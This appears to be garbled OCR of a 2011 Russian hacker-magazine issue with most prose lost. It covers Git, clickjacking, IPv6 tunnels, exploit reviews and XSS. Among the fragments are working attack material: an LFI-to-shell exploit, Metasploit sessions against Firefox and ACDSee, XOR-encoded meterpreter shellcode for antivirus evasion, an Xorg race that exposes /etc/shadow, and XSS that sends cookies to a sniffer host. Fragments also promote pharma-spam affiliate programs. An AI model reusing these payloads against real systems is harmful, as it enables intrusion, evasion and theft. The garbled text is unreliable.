preg_match('#php(.*)\.tmp#',$tmp_hex,$rd)) ? $rd[1] : '';

$tmp_hex seed .
. . ContentLength ( , ):
$req = substr($req,0,strlen($req)-2);
retname($host,$req);

.
, .
$tmp_hex +1 LFI. ? ,
. , PHP, ,
-
, .
. +2,
+3 . . , , , tmp-,
1 100.



LFI . -:
ttp://site.com/css.php?file=../../../tmp/
php7xEkH3&e=system('dir')


:
php expl.php step4 ../../../tmp/php7xEkH3.tmp
http://site.com/s.txt
here your shell: http://site.com/8149.php

expl.php , .



,
phpinfo() . , PHP Live,
magic_quotes=on ./super . Windows-
, nix*- BWMeter
. , - PHP
-
. , . z

12 /155/ 2011

Preview

32 .
.

PC ZONE
50

IPV6: HOWTO
IPv4 .
.
IPv6! ,
.

IP .
:
, .
.
/ ?

NAT IPv4.
IPv6,
,
.

PC ZONE

46




- , ? clickjacking.

68

:
.
.

102


,
, -
C++11
C++.

12 /155/ 2011

MALWARE

88


,
, , ,
, HIPS.

UNIXOID

106


Google
,

. .

120



kernel.org,linux.com,
linuxfoundation.org mysql.com.
?

041

PC ZONE

Git&GitHub:


5
,
version1, version2, version2a,
.
,
.
, hello
world,
.
15 ,
,
Git!

GIT?
Git ,
, Linux.
: , .
Git'
. : Git ,
.
, , , -
.
, , , ,
, ,
IDE.
. .

Git
, , , .
Linux git
. Mac', ,
git-osx-installer. Windows
,
( ).
Git
Windows, , , .
Git .
GitGUI, Git, IDE git, , ,
.
Git .
commit. . commit , ( ).
:
git config --global user.name "Your Name"
git config --global user.email "your@email.com"

, :
git config --global color.diff auto
git config --global color.status auto
git config --global color.branch auto

042

12 /155/ 2011

Git&GitHub:

commit


git config, ,
.
. .
, ,
(, , ,
).
git init
git, init.
Git- (
.git). , - . . ,
Git Bash (master). ,
. ?
. . () ,
. ( - ), , .
.
git add
commit.
Commit
, . ,
, commit, staging area.
. ,

, .
, staging area:
git add.
. .
:
git add *.js
git add index.php

git commit
commit , , ( ):
git commit
staging area
. commit

12 /155/ 2011

jQuery GitHub

, , ,
, . Git Vim (-,
). , <i> (
), , Initial
Commit. , , <ESC> :wq, . !
Git , commit
. -, -m
commit:
git commit -m "initial commit"

-a staging area
commit .
Git staging area
. -m -a
:
git commit -am 'update to index.php'

git status
git status
. .
commit, git status , .
, , . , ,
git add, - ,
changes to be
committed.
git branch / git checkout
, .
: , ,
. , ,
. Git ,
. branch,
, ,
.
git branch

branch,
. master
branch , .

043

PC ZONE

,
branch, :

git merge experimentalBrunch

git branch experimentalBrunch

experimentalBrunch
.

, Git
( - master-). checkout,
:

git log / gitk


, , , .
log.

git checkout experimentalBrunch

git log

, branch , : git checkout


-b branch name. , branch:
:

, ,
.
(git log graph) GUI-:
gitk --all

git add .
git commit -m 'New architecutre introduced'

,
. .
, , , :
git checkout master

: master- , , ,
.
git merge
. ,

master-.
git merge. , master branch,
:

044

.
, ,
.

GITHUB:
, , Git ,
,
. Git ,
.
,
Git. , ,
GitHub (www.github.com).
, , ,
.
, GitHub, , .
, Git . ,

12 /155/ 2011

Git&GitHub:

, . open source ,
Sign Up . ,
SSH-. ,
-, ( PuTTY)
GitHub-. Public Keys Add another public key.
.
SSH , .
,
, . ,
.
(help.github.com/working-withkey-pass-phrases).
git clone
Git , GitHub
.
, -
, (, ,
- , ). GitHub
. jQuery.
GitHub-, clone URL.
URL , ( Git
) , clone:
git clone git://github.com/jquery/jquery.git

Git jquery
. ,

gitk all.
git push
.
git,
. ! GitHub
(Create Repository), .
,
. GitHub
public clone URL ,
, personal clone URL .
GitHub .
git remote add origin git@github.com:aburgess/My-FirstGitHub-Repo.git
git push origin master

.
origin
private clone URL. git-push master origin (. . GitHub).
,
. GitHub-
.
git pull
push ,
git pull , .
: git fetch ( ) get merge
( ):
git fetch upstream master
git merge upstream/master

12 /155/ 2011


. GitHub Git-.
,
. , ,
,
. . , , ,
,
. GitHub , .
Explore GitHub,
Languages ,
. ,
Watch Fork:
Fork , ;
Watch , ,
, fashboard ( , ).
, . ,
, , .
Follow
, . .
Pull Request
Admin. ,
, (wiki,
download, issues) . .
, ,
. ,
,
Pull request.

FOLLOW GITHUB
GitHub .
-, Git
. .
1,1 , 3 . GitHub,
Git. z

045

PC ZONE

CLICKJACKING: , ,
, :
?,
.
, ,
.

.


,

-.

046

WWW

:
www.sectheory.
com/clickjacking.htm;
www.contextis.
com/resources/
white-papers/clickjacking;
w2spconf.
com/2010/papers/
p27.pdf;
www.owasp.org/
index.php/Clickjacking.

WARNING

.
.

CLICKJACKING?
,
. click jacking ,
- . , , ! ?
HTML-,
:
- <iframe>;
HTML- ,
;
HTML- ,

z-index.
, HTML-
! ,
, iframe,
, .
iframe
- ,
. , , iframe,
CSS- opacity

12 /155/ 2011

""

z-index.
, , , ,
, ,
.
CSS- .

?
clickjacking-.
,

, :
<html> <h1 style="text-align:center"> </h1>
<p style="font-size: 38px;">!
<br> !</p>
<!-- iframe -->
<div style="z-index:10; opacity:0; position:absolute;
top:0px; ">
<iframe scrolling="no" style="width:800px; height:500px;"
src="http://www.bing.com/search?q=buy+kindle+amazon">
</iframe>
</div>
<!-- iframe
-->
<div style="position:absolute; top:200px; left:210px;">
<a href="#"> ?</a>
</div>
</html>

,
Bing.
. ,

.
, , , Retwit Like,
, .
,
.

12 /155/ 2011


, , - ?
, , . ,
, -,
WordPress. ,
. -
WordPress, , .
,
Install Now (, , Firefox).
. http://wordpress/wp-admin/
plugin-install.php?tab=plugin-information&plugin=wp-galleryremote, plugin
. , iframe
Install Now. .
, ,
( ). , ,
( zip-)
URL: http://wordpress/wp-content/plugins/.
. ,
? . . ,
PoC SlidePress,
XSS-.
, .
(
)
(security-assessment.com).
WordPress 3.1.3 2011 .


(- !),
clickjacking. .

047

PC ZONE


?
, -
. ,
. JS-,
.
framebuster framekiller, :
if (top.location != location)
top.location = self.location;

X-FRAME-OPTIONS iframe

.
, ?
,
. ,
. iframe,
(,
).
( , ).
iframe anchor (http://example.com/#section),
.
iframe (
, ),
.
, ( -
, ). ,
.

Flash Player,
. .


-
Flash, , ,
-.
, Flash Player
, SWF- , , URL
www.macromedia.com/support/documentation/en/flashplayer/help/
settings_manager02.html. , ,
(: bit.ly/sDR5Qv). proof-of-concept iframe .
,
- . Adobe
, ( framebusting)
. .
. : , Adobe
iframe ,
SWF-,
Flash Player? , !

048

framebuster- ,
, , - ,
. , ,
,
clickjacking-. (bit.ly/vYFL4x),
framebuster-
.
, , :
<head>
<style> body { display : none;} </style>
</head>
<body>
<script>
if (self == top) {
var theBody = document.getElementsByTagName('body')[0];
theBody.style.display = "block";
} else {
top.location = self.location;
}
</script>
, JS-
. ?

, X-FRAMEOPTIONS. ,
! 2009 ,
(Internet Explorer, Safari,
Firefox, Chrome). X-FRAME-OPTIONS . DENY
.
SAMEORIGIN
.
( WordPress
). . -,
. -,
, (
X-FRAME-OPTIONS
). , -, ,
.

-

12 /155/ 2011

- . .

function refreshSettings(timeout) {
window.setTimeout(function() {
$('#settings').empty().append($('<iframe
allowtransparency="true" src="https://www.macromedia.com/support/flashplayer/sys/settingsmanager2.
swf?defaultTab=privacy"></iframe>'));
setSettingsVisibility();
}, timeout);
}

Adobe JavaScript-, iframe.


SWF-
- . ,
, ? :) (www.
feross.org/webcam-spy), PoC,
Mac Firefox Safari, GitHub (github.com/
feross/webcam-spy). ,
z-index opacity SWF-,
iframe. ,
,
Adobe.
. (
), -

Flash Player'

Wired Gizmodo , Flash .

?
, , ,
SQLi , , XSS. (, , ).
,
. , clickjacking
- ( ),
. FireFox NoScript
(addons.mozilla.org/ru/firefox/addon/noscript)
. ClearClick
,
. , . z

- WordPress

12 /155/ 2011

049

PC ZONE


IPV6-
?
, ,
:
IPv4- .
? ? ?
.

,
IPv4-

IPv6. :
.
IPv6

,
.

uTorrent Teredo

050

WWW

IPv6:
ipv6-test.com/
speedtest
,

IPv6:
bit.ly/rHoc4B


SixXS

:
bit.ly/v0tOAC

IPv6:

?
128-
(2001:5c0:1400:a::68d) 32- (65.148.151.124)
IPv6-. : IPv6-
, . ,
,
IPv4-. ,
IPv6, IP-,
NAT . , . .
1. ,
NAT.
NAT, IPv4- .
, () IP-
, () . NAT :
, ,
. ICQ, IP-, .
(
), IPv6 .
, , ,
IPv4 IPv6 (
IPv6 ).
, IPv6. ,
, ,
IPv6-
. IPv6
,
( IPv4-) .

12 /155/ 2011

IPv6:

NAT'. gogoCLIENT NAT Traversal,

IPv6- IPv4-. ,

2. IPv6-.
, -
(, BitTorrent), IPv6
, . ,
. . IP UDP, UDP IPv6, IPv6 TCP- UDP-,
.
, , IPv6- IPv4 (, UDPv4).
, .
IPv6-to-IPv4?
, IPv6
UDPv4-: , ,
.
3. . ,
. , torrent-,
NAT', ,
IP- (
). IPv6-,
. ,
, NAT',
IP- ( IPv6,
). torrent IPv6: uTorrent, Azureus, Transmission.
IPv6 DHT ( ),
, . peers6,
, 18 (16 , 2 ).

12 /155/ 2011

, IPv6- ,
. ,
thepiratebay.org ipv6.nnm-club.ru .
4. .
( , ). ,
,
:).
.
. , IPv6- .


, IPv6?
, , , IPv6- . , -,
, -, (
, ), , -, .
, ,
IPv4. , , IPv6-, ,
, .
. .

, . IPv6-,
. . IPv6
( ),
.
NAT, IPv4-, , ,
.
IPv6. .

051

PC ZONE


Gogonet/Freenet6
gogonet.gogo6.com
,
,
NAT. GUI, /56-
. IPv6, ,
, .
.
Hurricane Electric IPv6
http://www.tunnelbroker.net
, /48- IPv6-.
,
(, , , , , ,
), ,
. ,
,
IP.
SixXS
www.sixxs.net
AYIYA-, , ,
IPv6.
(
) 40
. :
(
LinkedIn), .
10 IPv6 (bit.ly/snYfdm).

6to4

IPv4-, 6to4
IPv6.
, . 6to4- IPv6-, 6to4-,
IPv4-, IPv6-. 6to4 IPv6-, anycast- 192.88.99.1. ,
6to4, IPv6- IPv6-.
, .
6to4- 2002:xxyy:zztt,
xx.yy.zz.tt IPv4-,
, ,
192.88.99.1. . 6to4
, 6to4
, ,
, . - ,

. .
IP-,
IPv6. 6to4 . ,
,
, , 200 .
Teredo

,
IP-, NAT. 6to4 -

052

IPv6-

Teredo. IPv6- IPv4


UDP- , ,
NAT. Microsoft
, Windows, nix-.
uTorrent, Install IPv6/Teredo ( uTorrent
IPv6, ). Teredo
( Vista/Windows 7):
ipv6 install
netsh int ipv6 set teredo client

(, , ) Teredo (, Miredo):
sudo apt-get install miredo

IPV6
1. IPv6 , , 128- . IPv6-
: , 2001:0db8:11a3:09d7:1f34:8a2e:07a0:765d.
0000,
. 2001:0db8:0000:0000:0000:0000:ae21:ad12 2001:db8::ae21:ad12. ,
IPv6-,
: http://[2001:db8::ae21:ad12]. , IPv6-
DNS-.
2. - , , IPv6 ,
IPv4. /prefix'
(CIDR / VLSM). IPv6 /64. . IPv6 /64- , ,
.
/48.
3. NAT'.
, (VoIP), ,
P2p-. .

12 /155/ 2011

IPv6:

IPv6-

: , ,
. ,
, (Teredo NAT). .
Teredo IPv6: ,
, (
,
teredo.remlab.net). .
6to4 IPv6-,
, Teredo
. : Teredo-
UDP-, . .
. , Teredo NAT.
ipv6.google.com, netsh int
ipv6 show teredo. :
NAT , Teredo .
( )
.

, , ,
IPv4-,
. , , IPv6-. (bit.ly/vRZwX8),

. ,
. ping
traceroute, ipv6-test.com. :
IPv6,
. ,
, , IPv6-. ,
IPv4-
.
( , ). ,
, .

IPv6 UDPv4
.
( , ) gogo6/
Freenet6 (gogonet.gogo6.com), .


, ,
, IPv6, ,

12 /155/ 2011

. freenet6, gogo6,
.
: IPv6-in-IPv4 (
, IP), IPv6-in-IPv4 NAT
Traversal ( IPv6-in-UDP-is-IPv4),
, IP, IPv4-in-IPv6 ( ,
IPv4-, IPv6-).
TSP (Tunnel
Setup Protocol). , .
:
1. gogoCLIENT (gogonet.gogo6.com/
profile/gogoCLIENT).
2. ,
Connect.
,
,
- IPv6- (, ipv6.google.com).
.
3653.
. ,
IPv4- IPv6.
IPv6-, :
1. (gogonet.gogo6.com/page/freenet6registration), freenet6 .
2. Connect Anonymously Connect Using the
Following Credentials, .
3. Connect.
IPv6-,
test-ipv6.com. .
freenet6 - (username.broker.freenet6.net).
,
plain-text'. ,
Advanced PASS DSS
3DES1 Digest MD5.

IPV6
freenet6 , IPv6-,
. ,
,
, (,
). ,
- .
, 10 ,
. z

053

/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK

SMS

! , IDS, DMZ,
PDF - ,
. ,
, SMS-, . ,
SMS. ,
, . (
).
, . :) Smsglobal
(www.smsglobal.com). ,

25 SMS- .
, ( Preferences Sender ID)

. ! ,
. ,
,
SMS 1 . ,
,
SMS. , - e-mail,
- SMS. , ,
,
- .


WINDOWS

, Windows 7/2008, ,
, ,
, .
1. .
2. :
.{ED7BA470-8E54-465E-825C-99712043E01C}

- , ,
. ,
EasyHack. :)
054

12 /155/ 2011

EASY HACK

,
. , !
. ,
, .
, -.
,
. ! ,

-. ,
. XXI
! -, . :)
Python- Findmyhash
(code.google.com/p/findmyhash). ,
-.
, .
:
python findmyhash_v1.1.2.py MD5 -g \
-h a25b2710ba9de114396adc7dfb0a7235
python findmyhash_v1.1.2.py NTLM -f hacked_domain.txt

:
-h ;
-f ;
-g Google.
,
.

MD5- NTLM-

RDP

, , , ,
,
,
. ,
,
, . , , ,
.
. RDP Windows
.
RDP ,
6- (
Vista Ser ver 2008).

,
rdp-.
. , ?

Default.rdp, (,
RDP 6). , password
51:b: .
,
CryptUnprotectData() crypt32.dll.
, ( ).
,
, , SID
, .

12 /155/ 2011

- Cain&Abel
(www.oxid.it).
Remote Desktop Password Decoder
rdp-. C&A
.
, MSF
.
rdp .
MSF, :
1. meterpreter .
2. post-:
run post/windows/gather/enum_rdp_pwd

rdp-

055

/ EASY HACK

SSLV3-

HTTPS. manin-the-middle SSL-,


SSLv3/TLS. -, BEAST
.
: , , arp-spoofing.
SSL
(
arp-spoofing ).
. ? SSL. 2009
TLS/SSLv3 renegotiation vuln (CVE-2009-3555).
, ( ,
). , 10 %
(
: www.ssllabs.com/ssldb/analyze.html).
. , ,

, .
, :
1) TLS handshake
( 1).
1.1 TLS ( 2).
1.2
2.
2) (
renegotiation).
3) 1, ,
2 ( Session ID,
, 1 2).

056

.
4) ,
1.2, , 3.
,
, . ,
, ( 1.1
1.2). (renegotiation)
( 2) ( 3).

.
(
:)) ?
TLS (Session ID).
, . ,

TCP. . ( 1)
( 1.1). ,
( 3),
.
?
, ,
( , ). (www.g-sec.lu/practicaltls.pdf).
. -,
SSLv3/TLS, HTTPS,
FTPS, SMTPS, POP3S . . , . ?
. ,
- .
, ,

12 /155/ 2011

EASY HACK

. ,
. , HTTP
:
1. URL. , CSRF,
GET-. header
injection.
1) 1.2
GET /path/to/resource.jsp HTTP/1.0
Ignor-me:
2) , ,
:
GET /path/to/resource.jsp HTTP/1.0
Ignore-me: GET /index.jsp HTTP/1.0
Cookie: sessionCookie=Token

2. Redirect c HTTPS HTTP. sslstrip.


HTTP HTTPS. , ,
. , sslstrip . SSL
renegotiation :

,
HTTP ( 1.2):
GET /url_that_will_302_to_HTTP
Ignore-what-comes-now:

3. XSS . web-
TRACE, JavaScript-.
1.2 :
TRACE / HTTP/1.0
X:This content will be reflected in the response to the cl
ient<html><script>alert('XSS')</script></html>
X-ignore:

. PoC. Python,
. :) ,
, - (www.ssllabs.com/ssldb/analyze.
html), ssltest, BackTrack 5,
ssltlstest .

100 %- ,
XOR METERPRETER

meterpreter Metasploit (www.metasploit.


com) . , ,
meterpreter .
, -
exe- ( ),
-
. meterpreter,
- exe-.
.
.
, . MSF c
msfpayload exe- ,
. :

XOR rocks! Avast

12 /155/ 2011

#msfpayload windows/meterpreter/bind_tcp R | msfencode \


-c 5 x86/shikata_ga_nai -t c -o test_3.c

:
windows/meterpreter/bind_tcp MSF;
R ;
msfencode ;
-c 5 x86/shikata_ga_nai payload ;
-t c : C;
-o test_3.c .

msfencode,
, . msfpayload c C R, stage ,
(meterpreter -).
, ,
. , MSF payload
,
. msfpayload
- ( ).
- -, ,
. ! main - MSF,

. :
int main (int argc, char **argv)
{
int (*func) ();
func=(int (*)()) buf;
(int)(*func)();
}

057

/ EASY HACK

meterpreter

. (GCC, VC).
Dev-Cpp.
.
, , meterpreter (,
icmp/udp-, TCP ,
meterpreter).
, XOR . :) XOR -:
unsigned char buf[] = ".shellcode_here";
int main(int argc, char **argv)
{
int i;
for (i=0;i<sizeof buf; i++){
buf[i] = buf[i] ^ 0xcc ;
printf("\\x%02x",buf[i]);
}
}

( EasyHack - ? :)). buf


XOR. . ,
- MSF, XOR.
-, , .
. :

058

1.
2.
3.
4.

- .
- , XOR.
main XOR.
main :
int main (int argc, char **argv)
{
int i;
for (i=0;i<sizeof buf; i++){
buf[i] = buf[i] ^ 0xcc ;
}
int (*func) ();
func=(int (*)()) buf;
(int)(*func)();
}

5. .
, , XOR
, (A ^ B ^ B = A).
Avast .
? , .
- ,
( XOR)
.

y0nd13 aka D1g1
. :)

12 /155/ 2011

WEXLER.HOME 903


, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .


. WEXLER.HOME
750 . ,
, .

WEXLER.HOME 903 Windows 7 .


64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).

Intel Core i5-650 3,2 - 4 . CPU



Turbo Boost, (, ). , .

GeForce GTX 460,


Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.

WEXLER.HOME 903
4 , .

. , , ,
.

Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.

(ivinside.blogspot.com)
(115612, . , .1)

,
! , ,
,
. , !


Apache mod_proxy

CVSSV2

5.0
(AV:N/AC:L/AU:N/C:P/I:N/A:N)

BRIEF

: 11 2011 .
: Rodrigo Marcos.
CVE: CVE-2011-3368.
(, Nginx Squid), Apache ,
mod_proxy.
-
(, ),
, .
, mod_proxy,
.
EXPLOIT

RewriteRule
ProxyPassMatch -,
, -. Apache
. .
, -
:
RewriteRule (.*)\.(jpg|gif|png) http://images.example.com$1.$2 [P]
ProxyPassMatch (.*)\.(jpg|gif|png) http://images.example.com$1.$2

,
. :
GET @other.example.com/something.png HTTP/1.1

400 Bad Request.


SECFORCE PoC . : goo.gl/Ob6yV.
mod_proxy ,
(DMZ).
,
Apache ( Apache, ,
).
, :
python apache_scan.py [options]
[options]
-r: Apache
-p: , Apache ( 80)
-u: URL ( /)
-d: (DMZ) (
127.0.0.1)
-e: DMZ ( single port scan)
-g: GET- DMZ ( /)
-h:

:

python apache_scan.py -r www.example.com -u /img/test.gif
, DMZ
python apache_scan.py -r www.example.com -u /img/test.gif
-d internalhost.local
, DMZ
python apache_scan.py -r www.example.com -u /img/test.gif \
-d internalhost.local -e 80 -g /accounts/index.html
TARGETS

Apache HTTP Server 1.3.x 1.3.42;


Apache HTTP Server 2.0.x 2.0.64;
Apache HTTP Server 2.2.x 2.2.21.

-, , :
SOLUTION
http://images.example.com@other.example.com/something.png

, other.example.com,
images.example.com@ .
URI (@other.example.com/something.png HTTP/1.1)
HTTP,

060

mod_proxy
(goo.gl/xNIqR). ,
RewriteRule :
RewriteRule /(.*)\.(jpg|gif|png) http://images.example.com/$1.$2 [P]

12 /155/ 2011


Xorg

CVSSV2

5.7
(AV:L/AC:L/AU:S/C:C/I:P/A:P)

BRIEF

: 28 2011 .
: vladz.
CVE: CVE-2011-4029.
vladz Xorg, /tmp/.tXn-lock (n
X). .
, X- .
EXPLOIT

Xorg /tmp/.Xn-lock. : ()
/tmp/.tXn-lock O_EXCL PID, /tmp/.Xn-lock, .
/tmp/.Xn-lock. , , .
, chmod() , , /tmp/.tXn-lock
, open().
, /tmp/.tXn-lock
open() ( 296) chmod() ( 318).
, , ... Xorg
( ),
( 341) ,
chmod()?
:
# strace X :1
[...]
open("/tmp/.tX1-lock", O_WRONLY|O_CREAT|O_EXCL, 0644) = 0
write(0, "
2192\n", 11)
= 11
chmod("/tmp/.tX1-lock", 0444)
= 0

1. X- (PID n).
2. , SIGSTOP /tmp/.tX1-lock. ,
chmod().
3.
/tmp/.tX1-lock.
4. /tmp/.tX1-lock -> /etc/shadow.
5. SIGCONT, chmod() 444 /etc/shadow.
, ,
X-, ,
. : /tmp/.X1-lock -> /dontexist.
X- FatalError().
exploit-db.com, ID 18040.
:

cc xchmod.c -o xchmod

./xchmod [///] ( - /etc/shadow)


$ ls -l /etc/shadow
-rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow
$ ./xchmod
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 4134 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg
process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 4134 resumed (SIGCONT sent)
[+] Attack succeeded, ls -l /etc/shadow:
-r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow
TARGETS

Xorg 1.4 1.11.2.


Xorg 1.3 USE_CHMOD.
SOLUTION

Xorg 1.11.2 1.12 .


, SIGSTOP
SIGCONT, . ,
. , :


Array.reduceRight - Mozilla
Firefox

CVSSV2

10.0
(AV:N/AC:L/AU:N/C:C/I:C/A:C)

BRIEF

: 13 2011 .
: Chris Rohlf, Yan Ivnitskiy, Matteo Memelli, dookie2000ca,
sinn3r, mr_me, TecR0c.
CVE: CVE-2011-2371.
Metasploit,
Mozilla Firefox 3.6. ,
reduceRight()
.
EXPLOIT

ACDSee FotoSlate 4.0. Access Violation.


SEH-

12 /155/ 2011

reduceRight callback
:
( callback-),
, , -

061

/
obj.length = 2197815302;
f = function trigger(prev, myobj, indx, array) {
alert(myobj[0]);
}
obj.reduceRight(f, 1, 2, 3);
</script>
</body>
</html>

spray() heap spraying ASLR. DEP ROP-:

Firefox 3.6.16. (generic/debug_trap)

. Callback- ( ), .
reduceRight JS-
array_extra jsarray.cpp. 2740
Array.Length :
jsuint length;
if (!js_GetLengthProperty(cx, obj, &length))
return JS_FALSE;

jsarray.cpp 2767. JavaScript- reduceRight,


start, end step .
jsint ( ).
jsint start = 0, end = length, step = 1;
switch (mode) {
case REDUCE_RIGHT:
start = length - 1, end = -1, step = -1;

start = length 1,
start , length . JS, , :
<html>
<head>
</head>
<body>
<object id="d"><object>
<script>
var myobject = document.getElementById('d');
function spray() {
//...
}
spray();
obj = new Array;

062

101F1806
101F180

POP EAX
RETN

; <&KERNEL32.VirtualAlloc>

103E0D7B
103E0D7D

MOV ESI,DWORD PTR DS:[EAX]


; kernel32.VirtualAlloc
RETN

102D8002
102D8003

POP EBP ; xul.1003876B


RETN

10040001
10040002

POP EBX
RETN

104E6917
104E6918

POP EDX
RETN

102AC000
102AC001

POP ECX ; xul.104C26F0


RETN

102E0005
102E0006

POP EDI ; xul.102AC001


RETN

101F1806
101F1807

POP EAX ; <&KERNEL32.VirtualAlloc>


RETN

102B3401
102B3402

PUSHAD
RETN

102AC001

RETN

7C809AE1 >
7C809AE3
7C809AE4
7C809AE6
7C809AE9
7C809AEC
7C809AEF
7C809AF2
7C809AF4

7C809AF9
7C809AFA

MOV EDI,EDI ; xul.102AC001


PUSH EBP
MOV EBP,ESP
PUSH DWORD PTR SS:[EBP+14]
PUSH DWORD PTR SS:[EBP+10]
PUSH DWORD PTR SS:[EBP+C]
PUSH DWORD PTR SS:[EBP+8]
PUSH -1
CALL kernel32.VirtualAllocEx
; //
;
POP EBP
RETN 10

1003876B

JMP ESP ; payload

Metasploit.
msf > use exploit/windows/browser/mozilla_reduceright
msf exploit(mozilla_reduceright) > set payload windows/
meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mozilla_reduceright) > set lhost 192.168.0.121
lhost => 192.168.0.121
msf exploit(mozilla_reduceright) > set uripath test

12 /155/ 2011

. 12
, ,
Metasploit, . ,
ACDSee FotoSlate 4.0 ( 146) id String,
. PLP-
ACDSee FotoSlate .
SEH- . pop-pop-ret,
, .
0x263a5b57 ipwssl6.dll.
:
msf > use exploit/windows/fileformat/acdsee_fotoslate_string
msf exploit(acdsee_fotoslate_string) > set payload
windows/exec
payload => windows/exec
msf exploit(acdsee_fotoslate_string) > set cmd calc.exe
cmd => calc.exe
msf exploit(acdsee_fotoslate_string) > exploit
[*] Creating 'msf.plp' file ...
[*] Generated output file
/home/pikofarad/.msf4/data/exploits/msf.plp

mod_proxy

uripath => test


msf exploit(mozilla_reduceright) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.121:4444

,
( ).
TARGETS

[*] Using URL: http://0.0.0.0:8080/test


[*] Local IP: http://192.168.0.121:8080/test
[*] Server started.
msf exploit(mozilla_reduceright) >
[*] Sending exploit to 192.168.0.123:1074...
[*] Sending stage (752128 bytes) to 192.168.0.123
[*] Meterpreter session 1 opened (192.168.0.121:4444 ->
192.168.0.123:1075) at 2011-10-17 18:32:40 +0400
[*] Session ID 1 (192.168.0.121:4444 ->
192.168.0.123:1075) processing InitialAutoRunScript
'migrate -f'
[*] Current server process: firefox.exe (1992)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1652
[+] Successfully migrated to process

ACDSee FotoSlate 4.0 Build 146.


SOLUTION

,
. z

TARGETS

Mozilla Firefox 3.6.16, 3.6.17.


SOLUTION

, .

ACDSee FotoSlate
id,
PLP-

CVSSV2

10.0
(AV:N/AC:L/AU:N/C:C/I:C/A:C)

BRIEF

: 10 2011 .
: Parvez Anwar, juan vazquez.
CVE: CVE-2011-2595.
ACD FotoSlate
, ,
4x6 5x7. ,

12 /155/ 2011

Xorg

063

(ICQ: 555-856-204)

DEMOTIVATORS.RU
XSS
- ,
, ()
.
, , XSS demotivators.ru.

WWW
demotivators.ru
;
www.djangoproject.com
Django-.

064

12 /155/ 2011



, .
:
, ,
, .
<b>. -
: <b> !</b>. , ,
?
, <script> <body>.
. XSS-, :
<sCr<bOdY>iPt>

,
, . , - ,
, .

<b lol="yeah"> </b>

. ,
<b>.
, , , :
<script>, <img>, <body>, <frameset>, <input>, <span>...

, -
PHP- strip_tags(),
. , . , <img> :
: <img src="http://1.com/1.jpg">
: < ="http://1.com/1.jpg">

, strip_tags(),
- . , . , -

XSS

12 /155/ 2011

065

JS-
XSS-
. : ( ),
, . .
, , , ? 2030
JS- , .
JS -:


,
,
XSS:

var servers = [
'http://free1.host1.com/',
'http://free2.host1.com/',
'http://free3.host1.com/',
...
'http://free1.host5.com/',
'http://free2.host5.com/',
'http://free3.host5.com/'
];
for (var key in servers)
{
document.getElementById('footer').innerHTML +=
'<script src="'+servers[key]+'"></script>';
if (loaded){break;}
}
if (loaded){...}
loaded, , .
,
, . ,
.
.
,
PHP ,
. ,
logs.txt, .

$_SERVER['HTTP_USER_AGENT'] ;
$_SERVER['REMOTE_ADDR'] IP-;
$_SERVER['HTTP_REFERER'] ( );
date("d.m.y H:i") ;
urldecode($_GET['c'])
;
$_SERVER['QUERY_STRING']
.

, strip_tags(). ,
Django, .
, ,
XSS-. , , , , .


, ,
- ,

.
, ,
HTML-. HTML,
- -
. , , XSS. - <!DOCTYPE>,
.
XSS ,
- .
.
:
<!><html><head></head><body></body></html>

066

, -
, ,
, , . <!DOCTYPE>!,
-
demotivators.ru HTML- (<html>
<body>). ,
, ,
, - . :-)

12 /155/ 2011

XSS DEMOTIVATORS.RU
XSS ,

.
:
1. - XSS
, vkontakte.ru, mail.ru,
yandex.ru . .
XSS ,
. , demotivators.ru .
, XSS
:

2. . :
, , ,
, JavaScript-,
XSS div-,
,
. ,
:
<script src="http://partner.ru/
js.php?id=123"></script>

:

// ""
function n(){return new Image();}
var xss_1=n(), xss_2=n(), xss_3=n(),
sniff = 'var x = new Image(); x.src
= "http://tvoi.sniffer.com/?c="+
escape(document.cookie);';
// XSS
""
xss_1.src = 'http://site1.ru/search.
php?q="><script>'+sniff+'</script>';
xss_2.src = 'http://site2.ru/search.
php?q="><script>'+sniff+'</script>';
xss_3.src = 'http://site3.ru/search.
php?q="><script>'+sniff+'</script>';

window.onload=function()
{
document.getElementById('banners').
innerHTML = '<script src="http://
partner.ru/js.php?id=123"></script>';
}
3. .
JS + PHP,
. : JS-,
, JS-

, . ,
- .
XSS-, , . , <!DOCTYPE> -
, ,
,
. ,
. <FRAMESET>.
:
<!DOCTYPE><FRAMESET onLoad="{xss}"></FRAMESET>

,
, .
:
<!DOCTYPE><FRAMESET onLoad="{xss}"
style="display:none;"></FRAMESET>

12 /155/ 2011

,
action
.
(, )

action-.
(, ).
4. pop-under
pop-up.
<script>, .
5.
iframe. , .
6. - JavaScript:
document.getElementById('id_dema').
src = 'http://host.ru/podmena.jpg';
7. : iframe

(
).
8.
JS-.

{xss} javascript- .
, . .
, ,
. ,
AJAX. , ,
-
HTML + JS. ,
.
.

THE END
.
, (
).
, XSS - .
, , ,
demotivators.ru.
.
:
500 .
12 (180
), .
,
. ! z

067

DBMX

,
, ,
!

,
.

WWW
www.master-x.com


.
www.gofuckbiz.com

-.
www.rxpblog.com

-.

( ) , .
, .
. ,
. ,
. - ,
.
,
, , . ,
, ,
.

-

, , .

.

068

OEM

, .
,
,
.

()

. , ,

,
-
,
.

CPA ( )
, -

,
, ,

.

12 /155/ 2011

:
:
:


(generics,
,
) .
,
,
,
, ,
.

- ,
,
3050% .


,
-
. -, ,
.
(, , )
.
.
,

.
.


(
).
.
,
.
-

,

, :).
, .

, .
-
.
,
, ,
.
, ,
.
-
.
.


Pharmcash.com

RX-Partners.biz

Stimul-Cash.com

OXOnetwork.com

2010

2006

2006

2007

/ -:

40% ,

100 45%,
300 50%

3050% (

)

75%

70%

, ,
, ,

, ,
, ,

, ,
, ,

